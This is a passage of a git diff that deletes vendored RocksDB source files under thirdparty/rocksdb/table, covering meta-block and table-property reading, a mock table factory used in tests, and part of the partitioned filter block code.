-    Add(TablePropertiesNames::kComparator, props.comparator_name);
-  }
-
-  if (!props.merge_operator_name.empty()) {
-    Add(TablePropertiesNames::kMergeOperator, props.merge_operator_name);
-  }
-  if (!props.prefix_extractor_name.empty()) {
-    Add(TablePropertiesNames::kPrefixExtractorName,
-        props.prefix_extractor_name);
-  }
-  if (!props.property_collectors_names.empty()) {
-    Add(TablePropertiesNames::kPropertyCollectors,
-        props.property_collectors_names);
-  }
-  if (!props.column_family_name.empty()) {
-    Add(TablePropertiesNames::kColumnFamilyName, props.column_family_name);
-  }
-
-  if (!props.compression_name.empty()) {
-    Add(TablePropertiesNames::kCompression, props.compression_name);
-  }
-}
-
-Slice PropertyBlockBuilder::Finish() {
-  for (const auto& prop : props_) {
-    properties_block_->Add(prop.first, prop.second);
-  }
-
-  return properties_block_->Finish();
-}
-
-void LogPropertiesCollectionError(
-    Logger* info_log, const std::string& method, const std::string& name) {
-  assert(method == "Add" || method == "Finish");
-
-  std::string msg =
-    "Encountered error when calling TablePropertiesCollector::" +
-    method + "() with collector name: " + name;
-  ROCKS_LOG_ERROR(info_log, "%s", msg.c_str());
-}
-
-bool NotifyCollectTableCollectorsOnAdd(
-    const Slice& key, const Slice& value, uint64_t file_size,
-    const std::vector<std::unique_ptr<IntTblPropCollector>>& collectors,
-    Logger* info_log) {
-  bool all_succeeded = true;
-  for (auto& collector : collectors) {
-    Status s = collector->InternalAdd(key, value, file_size);
-    all_succeeded = all_succeeded && s.ok();
-    if (!s.ok()) {
-      LogPropertiesCollectionError(info_log, "Add" /* method */,
-                                   collector->Name());
-    }
-  }
-  return all_succeeded;
-}
-
-bool NotifyCollectTableCollectorsOnFinish(
-    const std::vector<std::unique_ptr<IntTblPropCollector>>& collectors,
-    Logger* info_log, PropertyBlockBuilder* builder) {
-  bool all_succeeded = true;
-  for (auto& collector : collectors) {
-    UserCollectedProperties user_collected_properties;
-    Status s = collector->Finish(&user_collected_properties);
-
-    all_succeeded = all_succeeded && s.ok();
-    if (!s.ok()) {
-      LogPropertiesCollectionError(info_log, "Finish" /* method */,
-                                   collector->Name());
-    } else {
-      builder->Add(user_collected_properties);
-    }
-  }
-
-  return all_succeeded;
-}
-
-Status ReadProperties(const Slice& handle_value, RandomAccessFileReader* file,
-                      FilePrefetchBuffer* prefetch_buffer, const Footer& footer,
-                      const ImmutableCFOptions& ioptions,
-                      TableProperties** table_properties) {
-  assert(table_properties);
-
-  Slice v = handle_value;
-  BlockHandle handle;
-  if (!handle.DecodeFrom(&v).ok()) {
-    return Status::InvalidArgument("Failed to decode properties block handle");
-  }
-
-  BlockContents block_contents;
-  ReadOptions read_options;
-  read_options.verify_checksums = false;
-  Status s;
-  s = ReadBlockContents(file, prefetch_buffer, footer, read_options, handle,
-                        &block_contents, ioptions, false /* decompress */);
-
-  if (!s.ok()) {
-    return s;
-  }
-
-  Block properties_block(std::move(block_contents),
-                         kDisableGlobalSequenceNumber);
-  BlockIter iter;
-  properties_block.NewIterator(BytewiseComparator(), &iter);
-
-  auto new_table_properties = new TableProperties();
-  // All pre-defined properties of type uint64_t
-  std::unordered_map<std::string, uint64_t*> predefined_uint64_properties = {
-      {TablePropertiesNames::kDataSize, &new_table_properties->data_size},
-      {TablePropertiesNames::kIndexSize, &new_table_properties->index_size},
-      {TablePropertiesNames::kIndexPartitions,
-       &new_table_properties->index_partitions},
-      {TablePropertiesNames::kTopLevelIndexSize,
-       &new_table_properties->top_level_index_size},
-      {TablePropertiesNames::kFilterSize, &new_table_properties->filter_size},
-      {TablePropertiesNames::kRawKeySize, &new_table_properties->raw_key_size},
-      {TablePropertiesNames::kRawValueSize,
-       &new_table_properties->raw_value_size},
-      {TablePropertiesNames::kNumDataBlocks,
-       &new_table_properties->num_data_blocks},
-      {TablePropertiesNames::kNumEntries, &new_table_properties->num_entries},
-      {TablePropertiesNames::kFormatVersion,
-       &new_table_properties->format_version},
-      {TablePropertiesNames::kFixedKeyLen,
-       &new_table_properties->fixed_key_len},
-      {TablePropertiesNames::kColumnFamilyId,
-       &new_table_properties->column_family_id},
-      {TablePropertiesNames::kCreationTime,
-       &new_table_properties->creation_time},
-      {TablePropertiesNames::kOldestKeyTime,
-       &new_table_properties->oldest_key_time},
-  };
-
-  std::string last_key;
-  for (iter.SeekToFirst(); iter.Valid(); iter.Next()) {
-    s = iter.status();
-    if (!s.ok()) {
-      break;
-    }
-
-    auto key = iter.key().ToString();
-    // properties block is strictly sorted with no duplicate key.
-    assert(last_key.empty() ||
-           BytewiseComparator()->Compare(key, last_key) > 0);
-    last_key = key;
-
-    auto raw_val = iter.value();
-    auto pos = predefined_uint64_properties.find(key);
-
-    new_table_properties->properties_offsets.insert(
-        {key, handle.offset() + iter.ValueOffset()});
-
-    if (pos != predefined_uint64_properties.end()) {
-      // handle predefined rocksdb properties
-      uint64_t val;
-      if (!GetVarint64(&raw_val, &val)) {
-        // skip malformed value
-        auto error_msg =
-          "Detect malformed value in properties meta-block:"
-          "\tkey: " + key + "\tval: " + raw_val.ToString();
-        ROCKS_LOG_ERROR(ioptions.info_log, "%s", error_msg.c_str());
-        continue;
-      }
-      *(pos->second) = val;
-    } else if (key == TablePropertiesNames::kFilterPolicy) {
-      new_table_properties->filter_policy_name = raw_val.ToString();
-    } else if (key == TablePropertiesNames::kColumnFamilyName) {
-      new_table_properties->column_family_name = raw_val.ToString();
-    } else if (key == TablePropertiesNames::kComparator) {
-      new_table_properties->comparator_name = raw_val.ToString();
-    } else if (key == TablePropertiesNames::kMergeOperator) {
-      new_table_properties->merge_operator_name = raw_val.ToString();
-    } else if (key == TablePropertiesNames::kPrefixExtractorName) {
-      new_table_properties->prefix_extractor_name = raw_val.ToString();
-    } else if (key == TablePropertiesNames::kPropertyCollectors) {
-      new_table_properties->property_collectors_names = raw_val.ToString();
-    } else if (key == TablePropertiesNames::kCompression) {
-      new_table_properties->compression_name = raw_val.ToString();
-    } else {
-      // handle user-collected properties
-      new_table_properties->user_collected_properties.insert(
-          {key, raw_val.ToString()});
-    }
-  }
-  if (s.ok()) {
-    *table_properties = new_table_properties;
-  } else {
-    delete new_table_properties;
-  }
-
-  return s;
-}
-
-Status ReadTableProperties(RandomAccessFileReader* file, uint64_t file_size,
-                           uint64_t table_magic_number,
-                           const ImmutableCFOptions &ioptions,
-                           TableProperties** properties) {
-  // -- Read metaindex block
-  Footer footer;
-  auto s = ReadFooterFromFile(file, nullptr /* prefetch_buffer */, file_size,
-                              &footer, table_magic_number);
-  if (!s.ok()) {
-    return s;
-  }
-
-  auto metaindex_handle = footer.metaindex_handle();
-  BlockContents metaindex_contents;
-  ReadOptions read_options;
-  read_options.verify_checksums = false;
-  s = ReadBlockContents(file, nullptr /* prefetch_buffer */, footer,
-                        read_options, metaindex_handle, &metaindex_contents,
-                        ioptions, false /* decompress */);
-  if (!s.ok()) {
-    return s;
-  }
-  Block metaindex_block(std::move(metaindex_contents),
-                        kDisableGlobalSequenceNumber);
-  std::unique_ptr<InternalIterator> meta_iter(
-      metaindex_block.NewIterator(BytewiseComparator()));
-
-  // -- Read property block
-  bool found_properties_block = true;
-  s = SeekToPropertiesBlock(meta_iter.get(), &found_properties_block);
-  if (!s.ok()) {
-    return s;
-  }
-
-  TableProperties table_properties;
-  if (found_properties_block == true) {
-    s = ReadProperties(meta_iter->value(), file, nullptr /* prefetch_buffer */,
-                       footer, ioptions, properties);
-  } else {
-    s = Status::NotFound();
-  }
-
-  return s;
-}
-
-Status FindMetaBlock(InternalIterator* meta_index_iter,
-                     const std::string& meta_block_name,
-                     BlockHandle* block_handle) {
-  meta_index_iter->Seek(meta_block_name);
-  if (meta_index_iter->status().ok() && meta_index_iter->Valid() &&
-      meta_index_iter->key() == meta_block_name) {
-    Slice v = meta_index_iter->value();
-    return block_handle->DecodeFrom(&v);
-  } else {
-    return Status::Corruption("Cannot find the meta block", meta_block_name);
-  }
-}
-
-Status FindMetaBlock(RandomAccessFileReader* file, uint64_t file_size,
-                     uint64_t table_magic_number,
-                     const ImmutableCFOptions &ioptions,
-                     const std::string& meta_block_name,
-                     BlockHandle* block_handle) {
-  Footer footer;
-  auto s = ReadFooterFromFile(file, nullptr /* prefetch_buffer */, file_size,
-                              &footer, table_magic_number);
-  if (!s.ok()) {
-    return s;
-  }
-
-  auto metaindex_handle = footer.metaindex_handle();
-  BlockContents metaindex_contents;
-  ReadOptions read_options;
-  read_options.verify_checksums = false;
-  s = ReadBlockContents(file, nullptr /* prefetch_buffer */, footer,
-                        read_options, metaindex_handle, &metaindex_contents,
-                        ioptions, false /* do decompression */);
-  if (!s.ok()) {
-    return s;
-  }
-  Block metaindex_block(std::move(metaindex_contents),
-                        kDisableGlobalSequenceNumber);
-
-  std::unique_ptr<InternalIterator> meta_iter;
-  meta_iter.reset(metaindex_block.NewIterator(BytewiseComparator()));
-
-  return FindMetaBlock(meta_iter.get(), meta_block_name, block_handle);
-}
-
-Status ReadMetaBlock(RandomAccessFileReader* file,
-                     FilePrefetchBuffer* prefetch_buffer, uint64_t file_size,
-                     uint64_t table_magic_number,
-                     const ImmutableCFOptions& ioptions,
-                     const std::string& meta_block_name,
-                     BlockContents* contents) {
-  Status status;
-  Footer footer;
-  status = ReadFooterFromFile(file, prefetch_buffer, file_size, &footer,
-                              table_magic_number);
-  if (!status.ok()) {
-    return status;
-  }
-
-  // Reading metaindex block
-  auto metaindex_handle = footer.metaindex_handle();
-  BlockContents metaindex_contents;
-  ReadOptions read_options;
-  read_options.verify_checksums = false;
-  status = ReadBlockContents(file, prefetch_buffer, footer, read_options,
-                             metaindex_handle, &metaindex_contents, ioptions,
-                             false /* decompress */);
-  if (!status.ok()) {
-    return status;
-  }
-
-  // Finding metablock
-  Block metaindex_block(std::move(metaindex_contents),
-                        kDisableGlobalSequenceNumber);
-
-  std::unique_ptr<InternalIterator> meta_iter;
-  meta_iter.reset(metaindex_block.NewIterator(BytewiseComparator()));
-
-  BlockHandle block_handle;
-  status = FindMetaBlock(meta_iter.get(), meta_block_name, &block_handle);
-
-  if (!status.ok()) {
-    return status;
-  }
-
-  // Reading metablock
-  return ReadBlockContents(file, prefetch_buffer, footer, read_options,
-                           block_handle, contents, ioptions,
-                           false /* decompress */);
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/meta_blocks.h b/thirdparty/rocksdb/table/meta_blocks.h
deleted file mode 100644
index 220985d..0000000
--- a/thirdparty/rocksdb/table/meta_blocks.h
+++ /dev/null
@@ -1,132 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#pragma once
-
-#include <map>
-#include <memory>
-#include <string>
-#include <vector>
-
-#include "db/builder.h"
-#include "db/table_properties_collector.h"
-#include "util/kv_map.h"
-#include "rocksdb/comparator.h"
-#include "rocksdb/options.h"
-#include "rocksdb/slice.h"
-#include "table/block_builder.h"
-#include "table/format.h"
-
-namespace rocksdb {
-
-class BlockBuilder;
-class BlockHandle;
-class Env;
-class Footer;
-class Logger;
-class RandomAccessFile;
-struct TableProperties;
-class InternalIterator;
-
-class MetaIndexBuilder {
- public:
-  MetaIndexBuilder(const MetaIndexBuilder&) = delete;
-  MetaIndexBuilder& operator=(const MetaIndexBuilder&) = delete;
-
-  MetaIndexBuilder();
-  void Add(const std::string& key, const BlockHandle& handle);
-
-  // Write all the added key/value pairs to the block and return the contents
-  // of the block.
-  Slice Finish();
-
- private:
-  // store the sorted key/handle of the metablocks.
-  stl_wrappers::KVMap meta_block_handles_;
-  std::unique_ptr<BlockBuilder> meta_index_block_;
-};
-
-class PropertyBlockBuilder {
- public:
-  PropertyBlockBuilder(const PropertyBlockBuilder&) = delete;
-  PropertyBlockBuilder& operator=(const PropertyBlockBuilder&) = delete;
-
-  PropertyBlockBuilder();
-
-  void AddTableProperty(const TableProperties& props);
-  void Add(const std::string& key, uint64_t value);
-  void Add(const std::string& key, const std::string& value);
-  void Add(const UserCollectedProperties& user_collected_properties);
-
-  // Write all the added entries to the block and return the block contents
-  Slice Finish();
-
- private:
-  std::unique_ptr<BlockBuilder> properties_block_;
-  stl_wrappers::KVMap props_;
-};
-
-// Were we encounter any error occurs during user-defined statistics collection,
-// we'll write the warning message to info log.
-void LogPropertiesCollectionError(
-    Logger* info_log, const std::string& method, const std::string& name);
-
-// Utility functions help table builder to trigger batch events for user
-// defined property collectors.
-// Return value indicates if there is any error occurred; if error occurred,
-// the warning message will be logged.
-// NotifyCollectTableCollectorsOnAdd() triggers the `Add` event for all
-// property collectors.
-bool NotifyCollectTableCollectorsOnAdd(
-    const Slice& key, const Slice& value, uint64_t file_size,
-    const std::vector<std::unique_ptr<IntTblPropCollector>>& collectors,
-    Logger* info_log);
-
-// NotifyCollectTableCollectorsOnAdd() triggers the `Finish` event for all
-// property collectors. The collected properties will be added to `builder`.
-bool NotifyCollectTableCollectorsOnFinish(
-    const std::vector<std::unique_ptr<IntTblPropCollector>>& collectors,
-    Logger* info_log, PropertyBlockBuilder* builder);
-
-// Read the properties from the table.
-// @returns a status to indicate if the operation succeeded. On success,
-//          *table_properties will point to a heap-allocated TableProperties
-//          object, otherwise value of `table_properties` will not be modified.
-Status ReadProperties(const Slice& handle_value, RandomAccessFileReader* file,
-                      FilePrefetchBuffer* prefetch_buffer, const Footer& footer,
-                      const ImmutableCFOptions& ioptions,
-                      TableProperties** table_properties);
-
-// Directly read the properties from the properties block of a plain table.
-// @returns a status to indicate if the operation succeeded. On success,
-//          *table_properties will point to a heap-allocated TableProperties
-//          object, otherwise value of `table_properties` will not be modified.
-Status ReadTableProperties(RandomAccessFileReader* file, uint64_t file_size,
-                           uint64_t table_magic_number,
-                           const ImmutableCFOptions &ioptions,
-                           TableProperties** properties);
-
-// Find the meta block from the meta index block.
-Status FindMetaBlock(InternalIterator* meta_index_iter,
-                     const std::string& meta_block_name,
-                     BlockHandle* block_handle);
-
-// Find the meta block
-Status FindMetaBlock(RandomAccessFileReader* file, uint64_t file_size,
-                     uint64_t table_magic_number,
-                     const ImmutableCFOptions &ioptions,
-                     const std::string& meta_block_name,
-                     BlockHandle* block_handle);
-
-// Read the specified meta block with name meta_block_name
-// from `file` and initialize `contents` with contents of this block.
-// Return Status::OK in case of success.
-Status ReadMetaBlock(RandomAccessFileReader* file,
-                     FilePrefetchBuffer* prefetch_buffer, uint64_t file_size,
-                     uint64_t table_magic_number,
-                     const ImmutableCFOptions& ioptions,
-                     const std::string& meta_block_name,
-                     BlockContents* contents);
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/mock_table.cc b/thirdparty/rocksdb/table/mock_table.cc
deleted file mode 100644
index 86c3808..0000000
--- a/thirdparty/rocksdb/table/mock_table.cc
+++ /dev/null
@@ -1,142 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "table/mock_table.h"
-
-#include "db/dbformat.h"
-#include "port/port.h"
-#include "rocksdb/table_properties.h"
-#include "table/get_context.h"
-#include "util/coding.h"
-#include "util/file_reader_writer.h"
-
-namespace rocksdb {
-namespace mock {
-
-namespace {
-
-const InternalKeyComparator icmp_(BytewiseComparator());
-
-}  // namespace
-
-stl_wrappers::KVMap MakeMockFile(
-    std::initializer_list<std::pair<const std::string, std::string>> l) {
-  return stl_wrappers::KVMap(l, stl_wrappers::LessOfComparator(&icmp_));
-}
-
-InternalIterator* MockTableReader::NewIterator(const ReadOptions&,
-                                               Arena* arena,
-                                               bool skip_filters) {
-  return new MockTableIterator(table_);
-}
-
-Status MockTableReader::Get(const ReadOptions&, const Slice& key,
-                            GetContext* get_context, bool skip_filters) {
-  std::unique_ptr<MockTableIterator> iter(new MockTableIterator(table_));
-  for (iter->Seek(key); iter->Valid(); iter->Next()) {
-    ParsedInternalKey parsed_key;
-    if (!ParseInternalKey(iter->key(), &parsed_key)) {
-      return Status::Corruption(Slice());
-    }
-
-    if (!get_context->SaveValue(parsed_key, iter->value())) {
-      break;
-    }
-  }
-  return Status::OK();
-}
-
-std::shared_ptr<const TableProperties> MockTableReader::GetTableProperties()
-    const {
-  return std::shared_ptr<const TableProperties>(new TableProperties());
-}
-
-MockTableFactory::MockTableFactory() : next_id_(1) {}
-
-Status MockTableFactory::NewTableReader(
-    const TableReaderOptions& table_reader_options,
-    unique_ptr<RandomAccessFileReader>&& file, uint64_t file_size,
-    unique_ptr<TableReader>* table_reader,
-    bool prefetch_index_and_filter_in_cache) const {
-  uint32_t id = GetIDFromFile(file.get());
-
-  MutexLock lock_guard(&file_system_.mutex);
-
-  auto it = file_system_.files.find(id);
-  if (it == file_system_.files.end()) {
-    return Status::IOError("Mock file not found");
-  }
-
-  table_reader->reset(new MockTableReader(it->second));
-
-  return Status::OK();
-}
-
-TableBuilder* MockTableFactory::NewTableBuilder(
-    const TableBuilderOptions& table_builder_options, uint32_t column_family_id,
-    WritableFileWriter* file) const {
-  uint32_t id = GetAndWriteNextID(file);
-
-  return new MockTableBuilder(id, &file_system_);
-}
-
-Status MockTableFactory::CreateMockTable(Env* env, const std::string& fname,
-                                         stl_wrappers::KVMap file_contents) {
-  std::unique_ptr<WritableFile> file;
-  auto s = env->NewWritableFile(fname, &file, EnvOptions());
-  if (!s.ok()) {
-    return s;
-  }
-
-  WritableFileWriter file_writer(std::move(file), EnvOptions());
-
-  uint32_t id = GetAndWriteNextID(&file_writer);
-  file_system_.files.insert({id, std::move(file_contents)});
-  return Status::OK();
-}
-
-uint32_t MockTableFactory::GetAndWriteNextID(WritableFileWriter* file) const {
-  uint32_t next_id = next_id_.fetch_add(1);
-  char buf[4];
-  EncodeFixed32(buf, next_id);
-  file->Append(Slice(buf, 4));
-  return next_id;
-}
-
-uint32_t MockTableFactory::GetIDFromFile(RandomAccessFileReader* file) const {
-  char buf[4];
-  Slice result;
-  file->Read(0, 4, &result, buf);
-  assert(result.size() == 4);
-  return DecodeFixed32(buf);
-}
-
-void MockTableFactory::AssertSingleFile(
-    const stl_wrappers::KVMap& file_contents) {
-  ASSERT_EQ(file_system_.files.size(), 1U);
-  ASSERT_EQ(file_contents, file_system_.files.begin()->second);
-}
-
-void MockTableFactory::AssertLatestFile(
-    const stl_wrappers::KVMap& file_contents) {
-  ASSERT_GE(file_system_.files.size(), 1U);
-  auto latest = file_system_.files.end();
-  --latest;
-
-  if (file_contents != latest->second) {
-    std::cout << "Wrong content! Content of latest file:" << std::endl;
-    for (const auto& kv : latest->second) {
-      ParsedInternalKey ikey;
-      std::string key, value;
-      std::tie(key, value) = kv;
-      ParseInternalKey(Slice(key), &ikey);
-      std::cout << ikey.DebugString(false) << " -> " << value << std::endl;
-    }
-    FAIL();
-  }
-}
-
-}  // namespace mock
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/mock_table.h b/thirdparty/rocksdb/table/mock_table.h
deleted file mode 100644
index 71609a1..0000000
--- a/thirdparty/rocksdb/table/mock_table.h
+++ /dev/null
@@ -1,194 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#pragma once
-
-#include <algorithm>
-#include <atomic>
-#include <map>
-#include <memory>
-#include <set>
-#include <string>
-#include <utility>
-
-#include "util/kv_map.h"
-#include "port/port.h"
-#include "rocksdb/comparator.h"
-#include "rocksdb/table.h"
-#include "table/internal_iterator.h"
-#include "table/table_builder.h"
-#include "table/table_reader.h"
-#include "util/mutexlock.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-namespace rocksdb {
-namespace mock {
-
-stl_wrappers::KVMap MakeMockFile(
-    std::initializer_list<std::pair<const std::string, std::string>> l = {});
-
-struct MockTableFileSystem {
-  port::Mutex mutex;
-  std::map<uint32_t, stl_wrappers::KVMap> files;
-};
-
-class MockTableReader : public TableReader {
- public:
-  explicit MockTableReader(const stl_wrappers::KVMap& table) : table_(table) {}
-
-  InternalIterator* NewIterator(const ReadOptions&,
-                                Arena* arena,
-                                bool skip_filters = false) override;
-
-  Status Get(const ReadOptions&, const Slice& key, GetContext* get_context,
-             bool skip_filters = false) override;
-
-  uint64_t ApproximateOffsetOf(const Slice& key) override { return 0; }
-
-  virtual size_t ApproximateMemoryUsage() const override { return 0; }
-
-  void SetupForCompaction() override {}
-
-  std::shared_ptr<const TableProperties> GetTableProperties() const override;
-
-  ~MockTableReader() {}
-
- private:
-  const stl_wrappers::KVMap& table_;
-};
-
-class MockTableIterator : public InternalIterator {
- public:
-  explicit MockTableIterator(const stl_wrappers::KVMap& table) : table_(table) {
-    itr_ = table_.end();
-  }
-
-  bool Valid() const override { return itr_ != table_.end(); }
-
-  void SeekToFirst() override { itr_ = table_.begin(); }
-
-  void SeekToLast() override {
-    itr_ = table_.end();
-    --itr_;
-  }
-
-  void Seek(const Slice& target) override {
-    std::string str_target(target.data(), target.size());
-    itr_ = table_.lower_bound(str_target);
-  }
-
-  void SeekForPrev(const Slice& target) override {
-    std::string str_target(target.data(), target.size());
-    itr_ = table_.upper_bound(str_target);
-    Prev();
-  }
-
-  void Next() override { ++itr_; }
-
-  void Prev() override {
-    if (itr_ == table_.begin()) {
-      itr_ = table_.end();
-    } else {
-      --itr_;
-    }
-  }
-
-  Slice key() const override { return Slice(itr_->first); }
-
-  Slice value() const override { return Slice(itr_->second); }
-
-  Status status() const override { return Status::OK(); }
-
- private:
-  const stl_wrappers::KVMap& table_;
-  stl_wrappers::KVMap::const_iterator itr_;
-};
-
-class MockTableBuilder : public TableBuilder {
- public:
-  MockTableBuilder(uint32_t id, MockTableFileSystem* file_system)
-      : id_(id), file_system_(file_system) {
-    table_ = MakeMockFile({});
-  }
-
-  // REQUIRES: Either Finish() or Abandon() has been called.
-  ~MockTableBuilder() {}
-
-  // Add key,value to the table being constructed.
-  // REQUIRES: key is after any previously added key according to comparator.
-  // REQUIRES: Finish(), Abandon() have not been called
-  void Add(const Slice& key, const Slice& value) override {
-    table_.insert({key.ToString(), value.ToString()});
-  }
-
-  // Return non-ok iff some error has been detected.
-  Status status() const override { return Status::OK(); }
-
-  Status Finish() override {
-    MutexLock lock_guard(&file_system_->mutex);
-    file_system_->files.insert({id_, table_});
-    return Status::OK();
-  }
-
-  void Abandon() override {}
-
-  uint64_t NumEntries() const override { return table_.size(); }
-
-  uint64_t FileSize() const override { return table_.size(); }
-
-  TableProperties GetTableProperties() const override {
-    return TableProperties();
-  }
-
- private:
-  uint32_t id_;
-  MockTableFileSystem* file_system_;
-  stl_wrappers::KVMap table_;
-};
-
-class MockTableFactory : public TableFactory {
- public:
-  MockTableFactory();
-  const char* Name() const override { return "MockTable"; }
-  Status NewTableReader(
-      const TableReaderOptions& table_reader_options,
-      unique_ptr<RandomAccessFileReader>&& file, uint64_t file_size,
-      unique_ptr<TableReader>* table_reader,
-      bool prefetch_index_and_filter_in_cache = true) const override;
-  TableBuilder* NewTableBuilder(
-      const TableBuilderOptions& table_builder_options,
-      uint32_t column_familly_id, WritableFileWriter* file) const override;
-
-  // This function will directly create mock table instead of going through
-  // MockTableBuilder. file_contents has to have a format of <internal_key,
-  // value>. Those key-value pairs will then be inserted into the mock table.
-  Status CreateMockTable(Env* env, const std::string& fname,
-                         stl_wrappers::KVMap file_contents);
-
-  virtual Status SanitizeOptions(
-      const DBOptions& db_opts,
-      const ColumnFamilyOptions& cf_opts) const override {
-    return Status::OK();
-  }
-
-  virtual std::string GetPrintableTableOptions() const override {
-    return std::string();
-  }
-
-  // This function will assert that only a single file exists and that the
-  // contents are equal to file_contents
-  void AssertSingleFile(const stl_wrappers::KVMap& file_contents);
-  void AssertLatestFile(const stl_wrappers::KVMap& file_contents);
-
- private:
-  uint32_t GetAndWriteNextID(WritableFileWriter* file) const;
-  uint32_t GetIDFromFile(RandomAccessFileReader* file) const;
-
-  mutable MockTableFileSystem file_system_;
-  mutable std::atomic<uint32_t> next_id_;
-};
-
-}  // namespace mock
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/partitioned_filter_block.cc b/thirdparty/rocksdb/table/partitioned_filter_block.cc
deleted file mode 100644
index 2022459..0000000
--- a/thirdparty/rocksdb/table/partitioned_filter_block.cc
+++ /dev/null
@@ -1,311 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "table/partitioned_filter_block.h"
-
-#include <utility>
-
-#include "monitoring/perf_context_imp.h"
-#include "port/port.h"
-#include "rocksdb/filter_policy.h"
-#include "table/block.h"
-#include "table/block_based_table_reader.h"
-#include "util/coding.h"
-
-namespace rocksdb {
-
-PartitionedFilterBlockBuilder::PartitionedFilterBlockBuilder(
-    const SliceTransform* prefix_extractor, bool whole_key_filtering,
-    FilterBitsBuilder* filter_bits_builder, int index_block_restart_interval,
-    PartitionedIndexBuilder* const p_index_builder,
-    const uint32_t partition_size)
-    : FullFilterBlockBuilder(prefix_extractor, whole_key_filtering,
-                             filter_bits_builder),
-      index_on_filter_block_builder_(index_block_restart_interval),
-      p_index_builder_(p_index_builder),
-      filters_in_partition_(0) {
-  filters_per_partition_ =
-      filter_bits_builder_->CalculateNumEntry(partition_size);
-}
-
-PartitionedFilterBlockBuilder::~PartitionedFilterBlockBuilder() {}
-
-void PartitionedFilterBlockBuilder::MaybeCutAFilterBlock() {
-  // Use == to send the request only once
-  if (filters_in_partition_ == filters_per_partition_) {
-    // Currently only index builder is in charge of cutting a partition. We keep
-    // requesting until it is granted.
-    p_index_builder_->RequestPartitionCut();
-  }
-  if (!p_index_builder_->ShouldCutFilterBlock()) {
-    return;
-  }
-  filter_gc.push_back(std::unique_ptr<const char[]>(nullptr));
-  Slice filter = filter_bits_builder_->Finish(&filter_gc.back());
-  std::string& index_key = p_index_builder_->GetPartitionKey();
-  filters.push_back({index_key, filter});
-  filters_in_partition_ = 0;
-}
-
-void PartitionedFilterBlockBuilder::AddKey(const Slice& key) {
-  MaybeCutAFilterBlock();
-  filter_bits_builder_->AddKey(key);
-  filters_in_partition_++;
-}
-
-Slice PartitionedFilterBlockBuilder::Finish(
-    const BlockHandle& last_partition_block_handle, Status* status) {
-  if (finishing_filters == true) {
-    // Record the handle of the last written filter block in the index
-    FilterEntry& last_entry = filters.front();
-    std::string handle_encoding;
-    last_partition_block_handle.EncodeTo(&handle_encoding);
-    index_on_filter_block_builder_.Add(last_entry.key, handle_encoding);
-    filters.pop_front();
-  } else {
-    MaybeCutAFilterBlock();
-  }
-  // If there is no filter partition left, then return the index on filter
-  // partitions
-  if (UNLIKELY(filters.empty())) {
-    *status = Status::OK();
-    if (finishing_filters) {
-      return index_on_filter_block_builder_.Finish();
-    } else {
-      // This is the rare case where no key was added to the filter
-      return Slice();
-    }
-  } else {
-    // Return the next filter partition in line and set Incomplete() status to
-    // indicate we expect more calls to Finish
-    *status = Status::Incomplete();
-    finishing_filters = true;
-    return filters.front().filter;
-  }
-}
-
-PartitionedFilterBlockReader::PartitionedFilterBlockReader(
-    const SliceTransform* prefix_extractor, bool _whole_key_filtering,
-    BlockContents&& contents, FilterBitsReader* filter_bits_reader,
-    Statistics* stats, const Comparator& comparator,
-    const BlockBasedTable* table)
-    : FilterBlockReader(contents.data.size(), stats, _whole_key_filtering),
-      prefix_extractor_(prefix_extractor),
-      comparator_(comparator),
-      table_(table) {
-  idx_on_fltr_blk_.reset(new Block(std::move(contents),
-                                   kDisableGlobalSequenceNumber,
-                                   0 /* read_amp_bytes_per_bit */, stats));
-}
-
-PartitionedFilterBlockReader::~PartitionedFilterBlockReader() {
-  // TODO(myabandeh): if instead of filter object we store only the blocks in
-  // block cache, then we don't have to manually earse them from block cache
-  // here.
-  auto block_cache = table_->rep_->table_options.block_cache.get();
-  if (UNLIKELY(block_cache == nullptr)) {
-    return;
-  }
-  char cache_key[BlockBasedTable::kMaxCacheKeyPrefixSize + kMaxVarint64Length];
-  BlockIter biter;
-  BlockHandle handle;
-  idx_on_fltr_blk_->NewIterator(&comparator_, &biter, true);
-  biter.SeekToFirst();
-  for (; biter.Valid(); biter.Next()) {
-    auto input = biter.value();
-    auto s = handle.DecodeFrom(&input);
-    assert(s.ok());
-    if (!s.ok()) {
-      continue;
-    }
-    auto key = BlockBasedTable::GetCacheKey(table_->rep_->cache_key_prefix,
-                                            table_->rep_->cache_key_prefix_size,
-                                            handle, cache_key);
-    block_cache->Erase(key);
-  }
-}
-
-bool PartitionedFilterBlockReader::KeyMayMatch(
-    const Slice& key, uint64_t block_offset, const bool no_io,
-    const Slice* const const_ikey_ptr) {
-  assert(const_ikey_ptr != nullptr);
-  assert(block_offset == kNotValid);
-  if (!whole_key_filtering_) {
-    return true;
-  }
-  if (UNLIKELY(idx_on_fltr_blk_->size() == 0)) {
-    return true;
-  }
-  auto filter_handle = GetFilterPartitionHandle(*const_ikey_ptr);
-  if (UNLIKELY(filter_handle.size() == 0)) {  // key is out of range
-    return false;
-  }
-  bool cached = false;
-  auto filter_partition = GetFilterPartition(nullptr /* prefetch_buffer */,
-                                             &filter_handle, no_io, &cached);
-  if (UNLIKELY(!filter_partition.value)) {
-    return true;
-  }
-  auto res = filter_partition.value->KeyMayMatch(key, block_offset, no_io);
-  if (cached) {
-    return res;
-  }
-  if (LIKELY(filter_partition.IsSet())) {
-    filter_partition.Release(table_->rep_->table_options.block_cache.get());
-  } else {
